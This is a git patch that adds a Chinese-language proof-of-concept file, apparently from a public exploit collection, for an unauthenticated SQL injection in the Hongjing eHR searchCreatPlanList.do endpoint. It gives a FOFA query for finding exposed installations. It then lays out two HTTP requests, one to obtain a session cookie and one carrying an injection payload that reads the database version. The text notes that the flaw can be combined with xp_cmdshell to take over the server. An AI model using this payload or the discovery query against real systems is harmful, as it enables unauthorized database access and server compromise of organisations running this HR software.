From 07fc752841fae188f3244491dae063fc22c4936b Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Mon, 21 Apr 2025 10:07:48 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=AE=8F=E6=99=AFeHR=E4=BA=BA?= =?UTF-8?q?=E5=8A=9B=E8=B5=84=E6=BA=90=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?=E6=8E=A5=E5=8F=A3searchCreatPlanList=E5=AD=98=E5=9C=A8SQL?= =?UTF-8?q?=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...管理系统接口searchCreatPlanList存在SQL注入漏洞.md | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 wpoc/宏景OA/宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入漏洞.md diff --git a/wpoc/宏景OA/宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入漏洞.md b/wpoc/宏景OA/宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入漏洞.md new file mode 100644 index 0000000..23c4bd4 --- /dev/null +++ b/wpoc/宏景OA/宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入漏洞.md @@ -0,0 +1,29 @@ +# 宏景eHR人力资源管理系统接口searchCreatPlanList存在SQL注入漏洞 + +宏景eHR searchCreatPlanList.do接口处存在sql注入漏洞,未经身份验证的远程攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +## fofa + +``` +app="HJSOFT-HCM" +``` + +## poc + +第一步:获取cookie +```yaml +GET /templates/index/getpassword.jsp HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +``` +第二步:携带cookie访问 + +```yaml +GET /train/plan/searchCreatPlanList.do?b_selectPlan=query&selectID=1'%2B(1-@@VERSION)%2B')--+ HTTP/1.1 +Host: +Cookie: JSESSIONID=D3D69E3D8D5CD86DC4B10E91CD2062AB +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 +``` + +![image](https://github.com/user-attachments/assets/25d41e1f-69b3-4694-b3ba-1abeba156a3c)